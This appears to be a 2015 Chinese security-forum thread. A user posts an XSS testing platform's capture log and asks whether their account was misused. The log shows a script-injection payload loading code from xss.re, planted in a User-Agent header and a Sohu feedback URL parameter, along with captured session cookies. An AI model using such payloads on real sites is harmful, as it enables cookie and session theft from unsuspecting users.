野驴~ 发表于 2015-1-7 23:10:53

xss测试平台接收到诡异代码!难道我被当跳板了?

本帖最后由 野驴~ 于 2015-1-7 23:12 编辑

RT
看到HTTP_USER_AGENT:<script src=http://xss.re/7042></script>没??难道我的账号被人社工了,然后做跳板了???是你们谁,说出来,还是好盆友。/*论坛怎么上不了图片*/
    Date:2015-01-03 10:18:42
    OS:Unknown
    Browser:其它
    REMOTE_ADDR:111.194.140.48
    Region:北京市北
    HTTP_USER_AGENT:<script src=http://xss.re/7042></script>

    keepsession:开
    title:%u641C%u72D0%u6295%u8BC9--%u4FE1%u606F%u53CD%u9988
    cookie:cyan_uv=C6712832B800000195C217D31F9016EB; ci_session=a:4:{s:10:"session_id";s:32:"964dcbf2bf175cda66ed18a88e8714a6";s:10:"ip_address";s:12:"10.11.128.26";s:10:"user_agent";s:40:"<script src=http://xss.re/7042></script>";s:13:"last_activity";i:1420250551;}3453228d4b600b6537192735fbe6a345
    toplocation:http://request.help.sohu.com/help/feedback?type=suc&c_id=520&serial_number=%3Cscript%20src=http://xss.re/376%3E%3C/script%3E
    location:http://request.help.sohu.com/help/feedback?type=suc&amp;c_id=520&amp;serial_number=&lt;script src=http://xss.re/376&gt;&lt;/script&gt;
    data:

myfox9527 发表于 2015-1-8 01:25:02

应该不可能的等管理看看

C4r1st 发表于 2015-1-8 10:24:33

谁认为还是没有过滤吧。

huc-血刃 发表于 2015-1-10 11:07:13

哈哈哈,笑了!!!

Genius 发表于 2015-1-10 16:32:44

没错,就是我

XSS 发表于 2015-1-14 12:20:35

这个,真心是手误,不好意思,号码并未被社工,我保证

XSS 发表于 2015-1-14 12:22:56

弱弱问下xss.re/340是谁......
页: [1]
查看完整版本: xss测试平台接收到诡异代码!难道我被当跳板了?